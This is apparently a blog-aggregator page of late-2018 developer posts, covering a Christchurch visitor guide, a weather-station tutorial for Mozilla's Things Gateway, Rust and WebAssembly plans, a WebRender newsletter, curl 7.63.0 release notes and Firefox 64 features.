Nick CameronWhat to do in Christchurch

LCA 2018 is happening in January in Christchurch (which is a great conference and has a few Rust talks this year). I'm not able to attend, but I am in town, so I hope to meet some of my internet friends (get in touch!).

I thought I'd write down a few things to do in Christchurch for those who are new to the city. Don't get your hopes up for lots of tourist fun though (unless you have time to see some of the surrounding country), it is not the most interesting city, even less so since half of it was flattened in an earthquake. For more ideas, I like the Neat Places website.

Good places to drink coffee

  • C4
  • Coffee Embassy
  • the brunch places below

Good places to drink alcohol

  • The Volsted (near-ish the university)
  • 44 Welles Street

Good places to eat brunch

  • Hello Sunday
  • Unknown Chapter
  • Supreme Supreme (if they re-open in time - they're currently closed for refurbishment)
  • Addington Coffee Co
  • Caffeine Laboratory
  • Black Betty
  • Southside Social

Good places to eat dinner

  • Rangoon Ruby (Burmese)
  • Mumbaiwala (fancy Indian street food)
  • Birkenavala (cheap and delicious Indian)
  • Little High Eatery (hipster food court, lots of options)
  • Mexico (interesting but expensive Mexican food and lots of drinks)
  • Cassels (great pizza and great beer)

Best ice cream

  • Rollickin’ Gelato

Best place to swim

  • Jellie Park - 50m outdoor pool and 2x25m indoor pools. Also a decent gym which you can use without a membership.

Best place to run

  • Hagley Park

Best beach

  • Sumner - it has a good bit of sand plus some surfing and is a nice little beach village

Good places to go nearby

  • Castle Hill (On the way to Arthur's Pass, kind of magical, nature-sculpted boulders to work amongst)
  • Arthur's Pass national park (Mountains and forests, one of NZ's lesser visited NPs, but one of my favourite)
  • Akaroa (cute tourist town (and you can swim with dolphins), drive there the long way via Governor's Bay and enjoy food and views and chocolate at She cafe, as well as a nice drive. If you like cheese, stop at Barrys Bay)

Good things to see and do in town

  • Look at the ruins of the Cathedral and wonder the new city centre.
  • Riccarton House farmers market (Saturday Morning; lots of nice things to eat and drink)
  • Walk in the Port Hills
  • The Buskers Festival (Throughout January, lots of shows)
  • Go to the beach (see above)

Any questions, ping me on twitter - @nick_r_cameron.

Cameron KaiserA thank you to Ginn Chen, whom Larry Ellison screwed

Periodically I refresh my machines by dusting them off and plugging them in and running them for a while to keep the disks spinnin' and the caps chargin'. Today was the day to refurbish my Sun Ultra-3, the only laptop Sun ever "made" (they actually rebadged the SPARCle and later the crotchburner 1.2GHz Tadpole Viper, which is the one I have). Since its last refresh the IDPROM had died, as they do when they run out of battery, resetting the MAC address to zeroes and erasing the license for the 802.11b which I never used anyway. But, after fixing the clock to prevent GNOME from puking on the abnormal date, it booted and I figured I'd update Firefox since it still had 38.4 on it. Ginn Chen, first at Sun and later at Oracle, regularly issued builds of Firefox which ran very nicely on SPARC Solaris 10. Near as I can determine, Oracle has never offered a build of any Firefox post-Rust even to the paying customers they're bleeding dry, but I figured I should be able to find the last ESR of 52 and install that. (Amusingly this relic can run a Firefox in some respects more current than TenFourFox, which is an evolved and patched Firefox 45.)

To my consternation, however, there was no contributed build for 52.9, the last 52ESR. I had to walk all the way back to 52.0.2 to find the last Solaris 10 package, which was accompanied by this sad message:

This directory contains Solaris builds of Firefox 52.0.2 ESR, which are contributed by Oracle Solaris Desktop Beijing Team. If you have any problem with these builds, please send email to ginnchen at gmail dot com

This is the last contrib build before I leave Oracle.
My job is eliminated.
Thanks everyone for supporting me.
ginnchen@...

I don't know if anyone ever said to Ginn how much all that work was appreciated. Well, I'm saying it now. I hope for much greener pastures away from scum like Larry, who ruined Sun, Solaris and SPARC just by being his scummy self, and lays off good folks just so he can buy another island. Here is Ginn's last build:

To this day, in Solaris 11, Firefox 52.9 is the last Firefox available, probably using Ginn's work.

Hacks.Mozilla.OrgMDN Changelog for November 2018

Done in November

Here’s what happened in November to the code, data, and tools that support MDN Web Docs:

Here’s the plan for December:

Shipped monthly MDN payments

In September we launched MDN payments, giving MDN fans a new way to help MDN grow. On November 20th, we added the ability to schedule monthly payments.

A screenshot of the monthly payment banner, with $8/month selected.

Monthly payment banner on MDN

Potato London started work on this shortly after one-time payments launched. We kicked it off with a design meeting where we determined the features that could be delivered in 4 weeks. Potato and MDN worked closely to remove blockers, review code (in over 25 pull requests), and get it into the staging environment for testing. Thanks to everyone’s hard work, we launched a high-quality feature on schedule.

We’ve learned a lot from these payment experiments, and we’ll continue to find ways to maintain MDN’s growth in 2019.

Converted from Font Awesome to SVG

On November 6th, we deployed Schalk Neethling’s PR 5058, completing the transition from the FontAwesome webfont to inline SVG icons. There are a few icon and style changes, but the site should look the same to most users.

Different styles of notice banners with icons from MDN, showing the old Font Awesome banners on the left and the new SVG banners on the right

Banners with indicators before the change (left) and after converting to SVG

We had several reasons for this change in April, when Schalk started the project. The biggest gains were expected to be in performance and a simpler design. Over the year, we became aware that many content blockers prevent loading web fonts, and many users couldn’t see UIs that depended on icons. For example, the browser compatibility tables were unusable on mobile with Firefox Focus. This change fixes this issue.

We haven’t seen a significant performance improvement, although there may have been small improvements as this switch was rolled out over the year. This month, we explored some more radical changes, such as minimal styling and disabled JS, by shipping manually edited copies of wiki pages. These experiments will help us determine the highest impact changes for front-end performance, and provide insight into what areas to explore next.

Added browser names to compatibility tables

The new SVG icons are being used in the browser compatibility table. In the wider desktop view, we’ve added rotated browser labels (Kuma PR 5117 and KumaScript PR 997), so it is clearer which browser is which. We also launched a survey to ask visitors about their needs for compatibility data (Kuma PR 5133).

A screenshot of a compatibility table with rotated text labels and topped with a survey

The compatibility table for display has gotten even taller

The compatibility data continues to be released as an NPM package, and now a tagged release is also created, including the statistics and notable changes from the last release (BCD PR 3158).

Welcome David Flanagan

David Flanagan joined the MDN development team in November. David is the author of JavaScript: The Definitive Guide and several other books. He is a former Mozilla employee, and recently worked at Khan Academy. His skills and passions are a great fit for MDN’s mission, and we look forward to his help as we modernize and expand our tech stack. Welcome David!

Shipped tweaks and fixes

There were 248 PRs merged in November:

This includes some important changes and fixes:

35 pull requests were from first-time contributors:

Planned for December

Meet in Orlando

Twice a year, all of Mozilla comes together for an All-Hands meeting. This winter’s All-Hands is in Orlando, Florida. We were in Orlando in December 2015, when Florian was proposing moving KumaScript macros to GitHub and I was deploying the BrowserCompat API to beta users. A lot changes in three years!

Many of us at MDN will be taking well-deserved breaks after the All-Hands, and will come back refreshed for 2019. We hope you and yours have an enjoyable winter break!

The post MDN Changelog for November 2018 appeared first on Mozilla Hacks - the Web developer blog.

K Lars LohnThings Gateway - a Virtual Weather Station

Today, I'm going to talk about creating a Virtual Weather Station using the Things Gateway from Mozilla and a developer account from Weather Underground.  The two combined enable home automation control from weather events like temperature, wind, and precipitation.

I've already written the code and this blog is about how to use it.  In the next blog posting, I'll talk about how the code actually works.


Goal: create a virtual Web thing to get weather data into the Things Gateway for use in rules.  Specifically, make a rule that turns a green light on when the wind speed is high enough to fly a kite.

ItemWhat's it for?Where I got it
an RPi running the Things GatewayIt's our target to have the weather station provide values to the Things GatewayGeneral Download & Install Instructions
or see my own install instructions:
General Install & Zigbee setup,
Philip Hue setup,
IKEA TRÅDFRI setup,
Z-Wave setup,
TP-Link setup
A laptop or desktop PCthe machine to run the Virtual Weather Station. You can use the RPi itself.My examples will be for a Linux machine
a couple things set up on the Things Gateway to controlthis could be bulbs or switches I'm using Aeotec Smart Switches to run red and green LED bulbs.
the webthing and configman Python3 packagesthese are libraries used by the Virtual Weather Stationsee the pip install directions below
a clone of the pywot github repositoryit is where the the Virtual Weather Station code livessee the git clone directions below
a developer key for online weather datathis gives you the ability to download data from Weather Undergroundit's free from Weather Underground

Step 1: Download and install the configman and webthing Python 3 packages.  Clone the pywot github repository in a local directory appropriate for software development. While this can be done directly on the RPi, I'm choosing to use my Linux workstation. I like its software development environment better.
        
$ sudo pip3 install configman
$ sudo pip3 install webthing
$ git clone https://github.com/twobraids/pywot.git
$ cd pywot
$ export PYTHONPATH=$PYTHONPATH:$PWD
$ cd demo


So what is configman ?

This is an obscure library for configuration that I wrote years and years ago.  I continue to use it because it is really handy.  It combines command line, config files, the environment or anything conforming to the abstract type collections.Mapping to universally manage program configuration.  Configuration requirements can be spread across classes and then used for dynamic loading and dependency injection.  For more information, see my slides for my PyOhio 2014 talk: Configman.

What is webthing?

webthing is a Mozilla package for Python 3, that implements the Web Things api.  It provides a set of classes that represent devices and their properties, giving them an implementation that can be controlled over an HTTP connection.

What is pywot?

pywot is my project to create a wrapper around webthing that offers a more Pythonic interface than webthing does alone.  webthing closely follows a reference implementation written in Javascript, so it offers an API with a distinctly different idiom than most Python modules.  pywot is an attempt to pave over the idiomatic differences.

Step 2:  In the …/pywot/demo directory, there are several example files.  virtual_weather_station.py is our focus today.  In this posting, we're just going to run it, then we'll tear it apart and analyze it in the next posting.

Get a developers account for Weather Underground.  Take note of your API key that they assign to you.  You'll need this in the next step.

Step 3: Using your WU API key, your city and state, run the program like this:
        
$ ./virtual_weather_station.py -K YOUR_WU_API_KEY --city_name=Missoula --state_code=MT



Step 4: We're going to assume that there are two light bulbs already configured and named: Red, Green.  Add the virtual weather station to the Things Gateway. by pressing the "+" key.


Sometimes, I've noticed that the Things Gateway doesn't immediately find my Virtual Weather Station.  I've not nailed it down as to why, but something about mDNS on my network can be very slow to update - sometimes up to ten minutes.  In this case, you don't have to wait, just press "Add by URL..." and then enter the IP address of the machine running the Virtual Weather Station with this URL template: "http://IP_ADDRESS:8888"

Step 5: The Virtual Weather Station is now fetching weather data every five minutes (as controlled by the configuration value called seconds_between_polling, you can change that on the command line) .  The Things Gateway should have that data immediately:  press the "splat" on the "THING" icon for the weather station:


Step 6: Now we can make a rule to turn on the "Green" light whenever the wind speed exceeds the minimum rated speed for our kite.

Select RULES from the drop down menu.  Drag the Weather Station up into the top half of the screen; select "Wind Speed" from the drop down box; change the "<" to ">"; use the up/down buttons to set the minimum wind speed threshold.  I'm choosing 5.


Step 7: Drag the "Green" light into the other half of the blank pane, use the drop down box to select the "ON" property.


Step 8: Go to the top of the page, set a useful name to your rule, press <enter> and then use the left arrow to leave the rule editor.

Step 9:  You've now seen how to make a rule based on properties of the Weather Station.  Your task is to now make the rule for the Red light.  I made mine turn on the red light when the wind is less than 5mph - I call that calm winds.  You can make your red light rule do whatever you want.

That should be about it.

Remember that making a rule implies the creation of a converse rule.  The rule that I made above says the Green light should come on when the wind speed is greater than 5mph.  The converse rule says that wind speeds below 5mph, the light will go out.

If the wind speed was greater than five at the moment that the rule was created, there may be some counterintuitive behavior.  It appears that rules aren't applied immediately as they're created.  They trigger on an "event" that happens when a property changes value.  If the wind was greater than 5mph when the rule was created, the rule didn't yet exist when the "event" happened.  The kite light will still work once the wind speed changes again at the next five minute polling point.  Be patient.


Bonus Step:  want to run the Virtual Weather Station, but don't want to include the WU API key on the command line?  Try this:
        
$ ./virtual_weather_station.py -K YOUR_WU_API_KEY --admin.dump_conf=config.ini

That created a config file called: ./config.ini
Open up ./config.ini in an editor and uncomment the line that has your WU API key. Save the file.  You can specify the the config file on the command line when you run the Virtual Weather Station.  Any of the parameters can be loaded from the ini file.
        
$ ./virtual_weather_station.py -admin.conf=config.ini --city_name=Missoula --state_code=MT

Still too much typing? Instead of the config file, you could just set any/all of the parameters as environment variables:
        
$ weather_underground_api_key=YOUR_WU_KEY
$ city_name=Missoula
$ state_code=MT
$ ./virtual_weather_station.py


In my next blog post, I'm going to explain the code that runs the Virtual Weather Station in great detail.

Andrew HalberstadtTaskgraph Like a Pro

Have you ever needed to inspect the taskgraph locally? Did you have a bad time? Learn how to inspect the taskgraph like a PRO. For the impatient skip to the installation instructions below.


Will Kahn-GreeneSocorro: migrating to Python 3

Summary

Socorro is the crash ingestion pipeline for Mozilla's products like Firefox. When Firefox crashes, the Breakpad crash reporter asks the user if the user would like to send a crash report. If the user answers "yes!", then the Breakpad crash reporter collects data related to the crash, generates a crash report, and submits that crash report as an HTTP POST to Socorro. Socorro saves the crash report, processes it, and provides an interface for aggregating, searching, and looking at crash reports.

This blog post talks about the project migrating Socorro to Python 3. It covers the incremental steps we did and why we chose that path plus some of the technical problems we hit.

Read more… (16 mins to read)

QMOFirefox 65 Beta 6 Testday, December 21th

Hello Mozillians,

We are happy to let you know that Friday, December 21th, we are organizing Firefox 65 Beta 6 Testday. We’ll be focusing our testing on:  <notificationbox> and <notification> changes and UpdateDirectory.

Check out the detailed instructions via this etherpad.

No previous testing experience is required, so feel free to join us on #qa IRC channel where our moderators will offer you guidance and answer your questions.

Join us and help us make Firefox better!

See you on Friday!

Nick FitzgeraldRust and WebAssembly in 2019

Compiling Rust to WebAssembly should be the best choice for fast, reliable code for the Web. Additionally, the same way that Rust integrates with C calling conventions and libraries on native targets, Rust should also integrate with JavaScript and HTML5 on the Web. These are the Rust and WebAssembly domain working group’s core values.

In 2018, we made it possible to surgically replace performance-sensitive JavaScript with Rust-generated WebAssembly.

I propose that we make larger-scale adoption of Rust and WebAssembly practical in 2019.

#RustWasm2019: To provide some context for this blog post, the Rust and WebAssembly domain working group is currently soliciting proposals for its 2019 roadmap. This is my proposal. I encourage you to add your voice to the discussion as well!

A Rising Tide Lifts All Boats

We should build a toolkit of loosely coupled libraries that make Rust and WebAssembly development practical. Whether you are carefully inserting a small wasm module into an existing JavaScript system, architecting a large wasm module, or starting a green-field Web application, this toolkit should make you productive.

People use high-level libraries and frameworks instead of using Web APIs directly because they want abstractions with which they can naturally express themselves. For example:

  • I prefer describing how I want the DOM to look like right now, rather than enumerating a list of modifications that will transform its current state into my desired state.
  • I prefer thinking in terms of Rust types, not about the raw, serialized bytes in a fetched HTTP response body or about object stores in Indexed DB.

In order to get to rise to that level of abstraction, we will need a diverse set of libraries for the various capabilities the Web exposes:

  • Networking, fetch, and WebSockets
  • Working with forms and <input>
  • Timers and setTimeout
  • Web GL and Web Audio
  • Persistent client storage with Indexed DB
  • A console.log-based backend for env_logger and the Rust logging facade
  • URL routing and window.history
  • Custom elements and Web components
  • Etc…

In 2018, we made using all of these things possible in that you can access the underlying JavaScript and Web APIs directly via wasm-bindgen, js-sys and web-sy, but this is equivalent to programming against the libc crate directly. In 2019, we should create higher-level abstractions that wrap the raw, underlying API to yield a better experience that is ultimately more practical. Green-field Rust and WebAssembly applications would use an umbrella crate that connects the whole toolkit together and re-exports its individual crates. Small, targeted wasm modules that are integrating back into an existing JavaScript application would pick and choose relevant libraries from the toolkit instead of depending upon the whole umbrella crate.

We should collectively build these higher-level libraries and the toolkit’s umbrella crate that connects them together. There is a ton of room here for contributors to step up and provide leadership for a particular component library. This toolkit and all of its crates should reflect our working group’s core values:

  • Fast: Let’s show everyone how fast the Web can be ;-) Zero-cost abstractions from the ground up. No wandering off the happy path to fall off a performance cliff. No frames dropped.

  • Reliable: One of the things that I love about the Rust community is the high standards we hold ourselves to, in particular for correctness. We should leverage Rust’s type system to enforce correctness, write property-based tests with quickcheck, and have comprehensive integration tests running in headless browsers. We intend to build a solid foundation, and there shouldn’t be reason to question its structural integrity.

  • Excellent integration with JavaScript and the Web: We must empower incremental Rust and WebAssembly adoption: rewriting from scratch is not practical. Plus, there is a bunch of JavaScript code that wouldn’t make sense to rewrite in Rust because it is just fine right now.

In addition to supporting our core values, our toolkit should also be:

  • Modular: Take or leave any individual crate from the toolkit. We do not want to build a monolithic, walled garden! The goal is to amplify sharing, compatibility, and improvements; reducing effort duplication across the blossoming Rust and WebAssembly ecosystem.

  • Ergonomic: Rust’s abstractions are not only zero-cost, they are also expressive! We should leverage this to build APIs that are a joy to work with. The glium crate is an excellent example of transmuting a beautiful Rust crate from a crufty API that was not designed for the Rust language.

Some of the aforementioned Web APIs are already wrapped up into high-level APIs in crates that already exist. However, few of the extant crates fulfill all of our requirements. Most commonly they are lacking modularity: we’ve seen more “frameworks” than single-purpose libraries collected into “toolkits”. Nonetheless, we should collaborate to improve existing crates and tease them apart into small, single-purpose libraries where it makes sense and everyone is on board.

Finally, the inspiration for this idea of developing a loosely coupled toolkit comes from the Rust Networking domain working group’s Tide project, and also from the Choo JavaScript project. Thanks!

Tooling

Right now, wasm-pack will orchestrate your building and testing workflows, and generate a package.json file to help you integrate with JavaScript tooling. It will publish your Rust-generated WebAssembly package to NPM, making distribution easy.

But there are a few things that we intended to include in 2018 that didn’t quite make the cut:

  • Integrating and automating execution of the binaryen project’s wasm-opt tool.
  • Support for generating a single NPM package that will work both on the Web and in Node.js.
  • Allowing a library crate X to declare that it has a runtime dependency on an external NPM package, and have that reflected in the package.json that wasm-pack produces for some crate Y that transitively depends on X.
  • Including local assets (notably JavaScript snippets) into wasm-pack’s generated NPM package. Again, with support for crates that are transitively depended upon.

I suspect the latter two items in particular will be necessary for building out the toolkit.

We should finish these tasks and polish wasm-pack into a 1.0 tool. Following that, we should let experience and necessity guide our efforts.

One final note on tooling: Internet Explorer 11 is the last browser that still has non-trivial market share and doesn’t support wasm. It is mostly possible to support IE11 by using the binaryen project’s wasm2js tool to compile our wasm into JavaScript. But wasm2js is still missing some core functionality, and the whole experience of writing a Rust and wasm app while also supporting IE11 is far from turnkey. Because this is so important for actually shipping a Rust and wasm project, we shouldn’t leave this problem for users to solve via integration with external tooling: we should build support for it into our toolchain. This way we can provide that turnkey experience, and make sure that all wasm code that our toolchain emits is fully supported on Internet Explorer 11.

Multithreading

We must bring Rust’s fearless concurrency to the Web!

Of the languages (C, C++, and Rust) that can use shared memory threading on the Web, only Rust can safely do so. The Web APIs necessary for multithreading are stabilizing and will be enabled by default in browsers soon. We should be ready.

However, we can’t just make std::thread work transparently in wasm, due to the nature of the APIs the Web platform is exposing. For example, we can’t block the event loop indefinitely, even in a worker thread, and we need to change the global allocator to avoid waiting on locks on the main thread. See Alex’s excellent Multithreading Rust and WebAssembly write up for details.

Therefore, I think this multithreading effort will mostly involve creating a thread pool library for the whole wasm ecosystem to share, and then building channels and other concurrency abstractions on top of it. We should also get support for wasm threading and our thread pool library upstream into crates like rayon as well. This isn’t actually that different from the library and toolkit work, but it is worth singling out due to its scale, the unique nature of the problem domain, and what a huge game changer multithreading on the Web will be.

#RustWasm2019

I think 2019 holds a very bright future for Rust and WebAssembly.

Mozilla GFXWebRender newsletter #33

Hi! The newsletter skipped a week because of Mozilla’s bi-annual allhands which took place in Orlando last week. We’ll probably skip a few others in December as a lot of the gfx folks are taking some time off. Before I get to the usual change list, I’ll continue answering the questions nic4r asked in the 31st newsletter’s comment section:

Is the interning work Glenn is doing related to picture caching?

Yes indeed. In order for picture caching to work across displaylists we must be able to detect what did not change after a new displaylist arrives. The interning mechanism introduced by Glenn in #3075 gives us this ability in addition to other goodies such as de-duplication of interned resources and less CPU-GPU data transfer.

What is blob tiling and what does it offer above normal blob rendering?

Tiling blobs means splitting blobs into square tiles. For very large blobs this means we can lazily rasterize tiles as they come into the viewport without throwing away the rest instead of either rasterizing excessively large blob images in one go or having to clip the blob against the viewport and re-rasterize everything during scrolling as the bounds of the blob change. It also lets us rasterize tiles in parallel.

Is there a bug to watch some of the document splitting work going on? My understanding is that document splitting will make the chrome more resilient against slow scene builds in the content frame? Is this right? How does this compare to push_iframe in the DL.

You can look at bug 1441308 although it doesn’t contain a lot of updates. In a nutshell, the bulk of the Gecko side work is done and there are WebRender side adjustments and some debugging to do. Currently WebRender can nest displaylists from different sources (content, UI, etc) by nesting iframes into a single document. Any change to the document more or less causes it to be re-rendered entirely (modulo caching optimizations).

Separating the UI and web content into separate documents mostly means we will update them independently and updating one won’t cause the other to be re-built and re-rendered. It will also let us render the the two in separate OS compositor windows.

One of the most complicated aspect of this is probably due to the way the browser is structured to nest the web content within the UI (there is both a background behind the web content and elements on top of it that belong to the UI). A lot of the work that went into this was to be able to split without introducing a lot of overdraw (needlessly allocating texture space for the background behind the web content and drawing it).

OMTA for color, gradients, etc? How much more of CSS can be feasibly calculated off thread and fed to WR using its Property Binding infra?

Anything is possible given enough time and motivation but with WebRender’s current architecture, any of the data that is fed directly to the shaders is a good candidate for animated property bindings. Colors are particularly appealing because it is the most commonly animated CSS property that we don’t already run as an off-main-thread animation (I don’t have the data handy though). We’ll likely tackle these nice perf optimizations after WebRender is shipped and stable.

Notable WebRender and Gecko changes

  • Bobby overhauled WebRender shader cache.
  • Bobby switched non-WebRender’s AWSY test to VMs with GPUs.
  • Kats made some Android improvements.
  • Kats made some progress on the Windows CI work.
  • Kvark removed some memcpys leading to a 5% improvement on dl_mutate.
  • Kvark improved the render target allocation scheme, improving GPU times and VRAM consumption on a lot of sites.
  • Matt added new telemetry.
  • Andrew fixed a few regressions from animated image recycling.
  • Andrew Kvark and Nical chased a crash caused by two race conditions and landed two fixes.
  • Emilio fixed transform flattening.
  • Emilio enabled warning-as-errors for rust code in CI.
  • Glenn fixed the way we track frame ids.
  • Glenn fixed eager texture cache eviction.
  • Glenn added support for picture caching.
  • Glenn started a series of changes removing clips expressed in local space which cause over-invalidation of interned primitives and prevent picture caching to work effectively across displaylist changes. See also (1), (2), (3), (4), (5).
  • Glenn added memory profile counters for interning.
  • Glenn moved the picture caching tiles to the opaque pass.
  • Sotaro removed some dead code.
  • Sotaro fixed a shutdown crash on Linux.
  • Timothy hooked up proper scale selection.

Ongoing work

  • Bobby is adding lazy initialization to D3D11 and D2D outside the GPU process to save memory.
  • Jeff and Nical are working on blob recoordination.
  • Matt is working on avoiding to render on changes within zero-opacity elements.
  • Matt is making WebRender’s behavior more similar to non-WebRender’s during catch-up compositing to make comparison easier.
  • Lee continues tracking down font related crashes and rendering issues with very large text
  • Emilio is dreaming of 3d transforms (I believe he actually used the term “nightmare”).
  • Sotaro is investigating SVG rendering bugs.

Enabling WebRender in Firefox Nightly

In about:config, set the pref “gfx.webrender.all” to true and restart the browser.

Reporting bugs

The best place to report bugs related to WebRender in Firefox is the Graphics :: WebRender component in bugzilla.
Note that it is possible to log in with a github account.

Nick FitzgeraldRust Raps

🔥🔥🔥

Just released: the hot new single “Ferris Crab (Rust Raps 2018 Edition)” by Rusta Rhymes off their upcoming debut album impl Drop for Mic {}.

🔥🔥🔥

Listen

Download

Lyrics

(Intro)

My friend with the gift of gab? Ferris Crab.

(Verse 1)

One of my crates got a lot of fly traits
Twenty “i” eight edition? My decision: time to migrate
I’m getting irate at all the excess unsafe
wait — backtrace

We got a cute crab, which is the best crate?
That’s up for grabs. GitHub or Phab-
ricator, review my pull now or later
Hit @bors with the r+ and you’ll be my saviour

And when I’m coming through, I got a cargo too
Reaction to wasm? Domain working group
If you need a regex, BurntSushi is your dude
But if you need a Future well we also got a few

Popping off this Vec like a pimple
And you know that the block I’m from is an impl
So if I talk about an IR, no it’s not GIMPLE
Only rustc MIR, just that simple

(Chorus)

Thought there’d never be a Rust Rap?
Turns out this is just that
impl newsletter #RustFacts
Ferris Crab, that’s a must have
Data race, we gon’ bust that
Mem unsafe, we gon’ bust that
This the first and only Rust Rap
Ferris Crab, that’s a must have

(Verse 2)

If you never borrow check, then you’re gonna get wrecked
Pull out gdb cause you need to inspect out-of-bounds index
Oh guess what’s next?
Use after free turns out it’s gonna be

Or… just use the rustc
And you’ll be flushing all of these bugs down the drain
Gushing super fast code from your brain
No dusting: quite easy to maintain

What’s the secret sauce? It’s all zero cost
Couldn’t do it better if your boss
Demand you try to do it all by hand, but why?
Hate to be that guy, but generics monomorphize

Don’t use a while loop, i < n
Use an Iterator: much better by ten
And when you have a dozen eggs don’t start counting hens
But me and Ferris Crab: best friends to the end

(Chorus)

Thought there’d never be a Rust Rap?
Turns out this is just that
impl newsletter #RustFacts
Ferris Crab, that’s a must have
Data race, we gon’ bust that
Mem unsafe, we gon’ bust that
This the first and only Rust Rap
Ferris Crab, that’s a must have

(Outro)

My friend with the gift of gab? Ferris Crab.

Daniel Stenberg7.63.0 – another step down the endless path

This curl release was developed and put together over a period of six weeks (two weeks less than usual). This was done to accommodate to my personal traveling plans – and to avoid doing a release too close to Christmas in case we would ship any security fixes, but ironically, we have no security advisories this time!

Numbers

the 178th release
3 changes
42 days (total: 7,572)

79 bug fixes (total: 4,837)
122 commits (total: 23,799)
0 new public libcurl functions (total: 80)
1 new curl_easy_setopt() options (total: 262)

0 new curl command line option (total: 219)
51 contributors, 21 new (total: 1,829)
31 authors, 14 new (total: 646)
  0 security fixes (total: 84)

Changes

With the new CURLOPT_CURLU option, an application can now  pass in an already parsed URL to libcurl instead of a string.

When using libcurl’s URL API, introduced in 7.62.0, the result is held in a “handle” and that handle is what now can be passed straight into libcurl when setting up a transfer.

In the command line tool, the –write-out option got the ability to optionally redirect its output to stderr. Previously it was always a given file or stdout but many people found that a bit limiting.

Interesting bug-fixes

Weirdly enough we found and fixed a few cookie related bugs this time. I say “weirdly” because you’d think this is functionality that’s been around for a long time and should’ve been battle tested and hardened quite a lot already. As usual, I’m only covering some bugs here. The full list is in the changelog!

Cookie saving –  One cookie bug that we fixed was related to libcurl not saving a cookie jar when no cookies are kept in memory (any more). This turned out to be a changed behavior due to us doing more aggressive expiry of old cookies since a while back, and one user had a use case where they would load cookies from a cookie jar and then expect that the cookies would update and write to the jar again, overwriting the old one – although when no cookies were left internally it didn’t touch the file and the application thus reread the old cookies again on the next invoke. Since this was subtly changed behavior, libcurl will now save an empty jar in this situation to make sure such apps will note the blank jar.

Cookie expiry – For the received cookies that get ‘Max-Age=0’ set, curl would treat the zero value the same way as any number and therefore have the cookie continue to exist during the whole second it arrived (time() + 0 basically). The cookie RFC is actually rather clear that receiving a zero for this parameter is a special case and means that it should rather expire it immediately and now curl does.

Timeout handling – when calling curl_easy_perform() to do a transfer, and you ask libcurl to timeout that transfer after say 5.1 seconds, the transfer hasn’t completed in that time and the connection is in fact totally idle at that time, a recent regression would make libcurl not figure this out until a full 6 seconds had elapsed.

NSS – we fixed several minor  issues in the NSS back-end this time. Perhaps the most important issue was if the installed NSS library has been built with TLS 1.3 disabled while curl was built knowing about TLS 1.3, as then things like the ‘–tlsv1.2’ option would still cause errors. Now curl will fall back correctly. Fixes were also made to make sure curl again works with NSS versions back to 3.14.

OpenSSL – with TLS 1.3 session resumption was changed for TLS, but now curl will support it with OpenSSL.

snprintf – curl has always had its own implementation of the *printf() family of functions for portability reasons. First, traditionally snprintf() was not universally available but then also different implementations have different support for things like 64 bit integers or size_t fields and they would disagree on return values. Since curl’s snprintf() implementation doesn’t use the same return code as POSIX or other common implementations we decided we shouldn’t use the same name so that we don’t fool readers of code into believing that they are fully compatible. For that reason, we now also “ban” the use of snprintf() in the curl code.

URL parsing – there were several regressions from the URL parsing news introduced in curl 7.62.0. That os the first release that offers the new URL API for applications, and we also then switched the internals to use that new code. Perhaps the funniest error was how a short name plus port number (hello:80) was accidentally treated as a “scheme” by the parser and since the scheme was unknown the URL was rejected. The numerical IPv6 address parser was also badly broken – I take the blame for not writing good enough test cases for it which made me not realize this in time. Two related regressions that came from the URL  work broke HTTP Digest auth and some LDAP transfers.

DoH over HTTP/1 – DNS-over-HTTPS was simply not enabled in the build if HTTP/2 support wasn’t there, which was an unnecessary restriction and now h2-disabled builds will also be able to resolve host names using DoH.

Trailing dots in host name – an old favorite subject came back to haunt us and starting in this version, curl will keep any trailing dot in the host name when it resolves the name, and strip it off for all the rest of the uses where the name will be passed in: for cookies, for the HTTP Host: header and for the TLS SNI field. This, since most resolver APIs makes a difference between resolving “host” compared to “host.” and we wouldn’t previously acknowledge or support the two versions.

HTTP/2 – When we enabled HTTP/2 by default for more transfers in 7.62.0, we of course knew that could force more latent bugs to float up to the surface and get noticed. We made curl understand  HTTP_1_1_REQUIRED error when received over HTTP/2 and then retry over HTTP/1.1. and if NTLM is selected as the authentication to use curl now forces HTTP/1 use.

Next release

We have suggested new features already lined up waiting to get merged so the next version is likely to be called 7.64.0 and it is scheduled to happen on February 6th 2019.

Hacks.Mozilla.OrgFirefox 64 Released

Firefox 64 is available today! Our new browser has a wealth of exciting developer additions both in terms of interface features and web platform features, and we can’t wait to tell you about them. You can find out all the news in the sections below — please check them out, have a play around, and let us know your feedback in the comment section below.

New Firefox interface features

Multiple tab selection

We’re excited to introduce multiple tab selection, which makes it easier to manage windows with many open tabs. Simply hold Control (Windows, Linux) or Command (macOS) and click on tabs to select them.

Once selected, click and drag to move the tabs as a group — either within a given window, or out into a new window.

Devtools improvements

Our Developer Tools also gained a notable new feature: when hovering over text, the Accessibility Inspector now displays text contrast ratios in the pop-up infobar.

An element is selected by the Accessibility Inspector, and the highlighters shows a AA contrast ratio

The infobar also indicates whether or not the text meets WCAG 2.0 Level AA or AAA accessibility guidelines for minimum contrast.

Another great addition is related to Responsive Design Mode — device selection is now saved between sessions.

New CSS features in 64

Standardizing proprietary styling features

As part of our platform work, we’re trying to standardize some of the non-standard CSS features that have often caused developers cross-browser headaches. Landing in 64 we’ve got the following:

New media queries

Firefox 64 sees the addition of new media queries from the Level 4 and Level 5 specifications for detecting pointers/touchscreens, whether the user can hover over something, and whether the user prefers reduced-motion.

Multi-position color stop gradients

CSS gradients now support multi-position color stops (e.g. see their use on linear gradients). So now yellow 25%, yellow 50% can now be written yellow 25% 50%, for example.

JavaScript improvements

There were a lot of internal improvements this time around. In terms of developer facing improvements:

New Web API highlights

Fullscreen API unprefixed

Goodbye mozRequestFullScreen! The Fullscreen API is now available in Firefox without a prefix. The requestFullscreen and exitFullscreen APIs now also return promises that resolve once the browser finishes transitioning between states.

WebVR 1.1 in macOS

What’s more immersive than Fullscreen? Virtual reality, of course. And Firefox 64 now supports WebVR 1.1 on macOS!

startMessages() for Service Workers

On a completely unrelated note, pages with Service Workers can now use the startMessages() API to begin receiving queued worker messages, even before page loading has completed.

New Add-ons Features

What follows are the highlights. For more details, see Extensions in Firefox 64.

Context menu enhancements

Firefox 64 introduces an entirely new API, browser.menus.overrideContext, which allows complete customization of the context menu shown within add-on content like sidebars, popups, etc. These context menus can also automatically include custom entries from other add-ons, as though the user had right-clicked on a tab or bookmark. Piro’s blog post explains how it all works.

A custom context menu used by the Tree Style Tab extension

In addition:

  • You can now restrict where context menus can appear in an add-on using the new viewTypes property in menus.create() and menus.update().
